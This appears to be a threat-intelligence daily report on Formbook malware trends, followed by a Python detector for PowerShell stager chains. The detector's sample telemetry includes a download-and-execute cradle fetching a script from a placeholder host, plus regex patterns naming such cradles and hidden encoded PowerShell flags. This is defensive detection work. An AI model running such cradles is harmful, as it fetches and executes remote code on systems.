Daily Summary
Formbook activity remains stable with 37 new samples recorded, slightly above the 7-day average of 33 (+12%). This marginal increase is consistent with the family’s typical low-variance operational tempo, with no sudden surges or drops indicating a campaign launch or shutdown.
New Samples Detected
Script-based payloads dominate today’s batch, with PowerShell (.ps1) accounting for 38% of samples and JavaScript (.js) for 24%. This continues a recent shift away from binary executables toward living-off-the-land delivery. Notable is a single sample with the unusual extension .32783286, likely a renamed or obfuscated archive. The mix of .vbe (4), .vbs (3), and .dll (2) suggests multi-stage infection chains rather than direct execution.
Distribution Methods
File type patterns indicate phishing email attachments remain the primary vector. The high proportion of .ps1 files points to campaigns that use macro-enabled documents or embedded scripts to download and execute PowerShell stagers. An archive-only sample (.7z) may represent a zipped script bundle, potentially password-protected to evade email gateways.
Detection Rate
Current variants appear to be widely detected by major AV engines, given the stable sample count and the prevalence of well-known script loaders. However, the presence of a custom-extension binary and polymorphic .vbe/.vbs scripts suggests some samples may still bypass signature-based detection during the initial stages. Analysts should monitor behavioral detections for script execution chains.
C2 Infrastructure
55 new C2 servers and 92 fresh IOCs were identified today, a high volume relative to only 37 samples. This indicates either rapid infrastructure rotation or multiple concurrent campaigns sharing backend nodes. No geographic concentration is evident yet; continued monitoring of newly generated domains is recommended.
7-Day Trend
Activity is steady over the past week, with daily volumes oscillating within a narrow band. The 12% deviation from the average is not statistically significant, suggesting no active expansion or contraction of Formbook operations.
Security Analysis
A non-obvious observation is that .exe samples no longer dominate, despite the family’s historical preference for compiled executables. Today’s script-heavy distribution may indicate an evolution toward fileless techniques to bypass application whitelisting. Actionable recommendation: Enable PowerShell logging and script block logging on endpoints, and implement AMSI (Anti-Malware Scan Interface) to intercept these loaders at the execution layer.
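As an added illustration of the monitoring recommended above (example code written for this summary, not part of the original report or any vendor tooling), the following Python detector correlates process-creation records with PowerShell script block records by host and process id and flags the script-host-to-PowerShell stager chains described here. The event field names, finding tags and sample records are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample telemetry (not taken from the report): process-creation records
# and PowerShell script block (event 4104-style) records, reduced to the fields the rules use.
EVENTS = [
    {"kind": "proc", "host": "ws01", "pid": 4120, "image": "wscript.exe", "parent": "outlook.exe",
     "cmd": r"wscript.exe C:\Users\a\Downloads\invoice.vbe"},
    {"kind": "proc", "host": "ws01", "pid": 4188, "image": "powershell.exe", "parent": "wscript.exe",
     "cmd": "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand <base64-placeholder>"},
    {"kind": "script", "host": "ws01", "pid": 4188,
     "text": "IEX (New-Object Net.WebClient).DownloadString('http://stager.example.invalid/a.ps1')"},
    {"kind": "proc", "host": "ws02", "pid": 900, "image": "powershell.exe", "parent": "explorer.exe",
     "cmd": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"kind": "script", "host": "ws02", "pid": 900, "text": r"Copy-Item C:\data D:\backup -Recurse"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}            # launchers for .vbs/.vbe/.js payloads
OFFICE = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}  # macro-enabled documents and mail client
# Flags typical of a hidden, encoded PowerShell stager; a benign -File run does not match.
SUSPICIOUS_FLAGS = re.compile(r"-(enc(odedcommand)?|w(indowstyle)?\s+hidden|nop(rofile)?)\b", re.I)
# Download-and-execute cradle patterns as they appear in script block logging.
DOWNLOAD_CRADLE = re.compile(r"\b(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr|IEX|Invoke-Expression)\b", re.I)

def analyze(events):
    """Return {(host, pid): [finding, ...]} for processes that look like a script-based stager chain."""
    findings = defaultdict(list)
    for e in events:
        key = (e["host"], e["pid"])
        if e["kind"] == "proc":
            parent, image = e["parent"].lower(), e["image"].lower()
            if image in SCRIPT_HOSTS and parent in OFFICE:
                findings[key].append("office-spawned-script-host")
            if image == "powershell.exe" and parent in SCRIPT_HOSTS:
                findings[key].append("script-host-spawned-powershell")
            if image == "powershell.exe" and SUSPICIOUS_FLAGS.search(e["cmd"]):
                findings[key].append("suspicious-powershell-flags")
        elif e["kind"] == "script" and DOWNLOAD_CRADLE.search(e["text"]):
            findings[key].append("download-cradle-in-script-block")
    return dict(findings)

if __name__ == "__main__":
    for (host, pid), tags in analyze(EVENTS).items():
        print(f"{host} pid={pid}: {', '.join(tags)}")
```

The script block rule only fires if script block logging is enabled on the endpoint, which is why the logging recommendation above comes first.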